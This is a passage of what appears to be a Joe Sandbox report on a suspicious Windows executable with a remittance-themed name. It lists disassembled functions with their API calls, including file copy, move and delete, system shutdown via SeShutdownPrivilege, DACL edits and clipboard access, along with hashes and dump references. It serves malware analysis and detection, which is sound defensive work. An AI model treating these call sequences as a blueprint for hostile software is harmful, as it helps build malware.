                                                                        • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                      • _wcscat.LIBCMT ref: 0044BD94
                                                                      • _wcscat.LIBCMT ref: 0044BDBD
                                                                      • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                      • _wcscpy.LIBCMT ref: 0044BE71
                                                                      • _wcscat.LIBCMT ref: 0044BE83
                                                                      • _wcscat.LIBCMT ref: 0044BE95
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                      • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                      • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                      • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                      • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                      • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                      • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                      • String ID: \*.*
                                                                      • API String ID: 2188072990-1173974218
                                                                      • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                      • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                      • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                      • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                      • FindClose.KERNEL32(00000000), ref: 00478924
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                      • __swprintf.LIBCMT ref: 004789D3
                                                                      • __swprintf.LIBCMT ref: 00478A1D
                                                                      • __swprintf.LIBCMT ref: 00478A4B
                                                                      • __swprintf.LIBCMT ref: 00478A79
                                                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                      • __swprintf.LIBCMT ref: 00478AA7
                                                                      • __swprintf.LIBCMT ref: 00478AD5
                                                                      • __swprintf.LIBCMT ref: 00478B03
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                      • API String ID: 999945258-2428617273
                                                                      • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                      • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                      • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                      • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                      APIs
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                      • __wsplitpath.LIBCMT ref: 00403492
                                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                      • _wcscpy.LIBCMT ref: 004034A7
                                                                      • _wcscat.LIBCMT ref: 004034BC
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                      • _wcscpy.LIBCMT ref: 004035A0
                                                                      • _wcslen.LIBCMT ref: 00403623
                                                                      • _wcslen.LIBCMT ref: 0040367D
                                                                      Strings
                                                                      • Unterminated string, xrefs: 00428348
                                                                      • Error opening the file, xrefs: 00428231
                                                                      • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                      • _, xrefs: 0040371C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                      • API String ID: 3393021363-188983378
                                                                      • Opcode ID: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                                      • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                      • Opcode Fuzzy Hash: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                                      • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                      • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                      • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                      • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                      • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1409584000-438819550
                                                                      • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                      • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                      • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                      • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                      • __swprintf.LIBCMT ref: 00431C2E
                                                                      • _wcslen.LIBCMT ref: 00431C3A
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                      • String ID: :$\$\??\%s
                                                                      • API String ID: 2192556992-3457252023
                                                                      • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                      • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                      • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                      • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                      APIs
                                                                      • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                      • __swprintf.LIBCMT ref: 004722B9
                                                                      • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                      • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                      • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                      • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                      • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                      • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                      • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                      • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                      • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: FolderPath$LocalTime__swprintf
                                                                      • String ID: %.3d
                                                                      • API String ID: 3337348382-986655627
                                                                      • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                      • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                      • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                      • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                      • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                      • FindClose.KERNEL32(00000000), ref: 00442930
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                      • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                        • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                      • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 2640511053-438819550
                                                                      • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                      • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                      • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                      • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                      • GetLastError.KERNEL32 ref: 00433414
                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                      • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                      • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                      • String ID: SeShutdownPrivilege
                                                                      • API String ID: 2938487562-3733053543
                                                                      • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                      • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                      • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                      • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                      APIs
                                                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                        • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                        • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                      • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                      • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 1255039815-0
                                                                      • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                      • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                      • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                      • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                      APIs
                                                                      • __swprintf.LIBCMT ref: 00433073
                                                                      • __swprintf.LIBCMT ref: 00433085
                                                                      • __wcsicoll.LIBCMT ref: 00433092
                                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                      • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                      • LockResource.KERNEL32(?), ref: 00433120
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                      • String ID:
                                                                      • API String ID: 1158019794-0
                                                                      • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                      • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                      • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                      • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
                                                                      • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                      • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                      • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                      • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                      • GetLastError.KERNEL32 ref: 0045D6BF
                                                                      • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
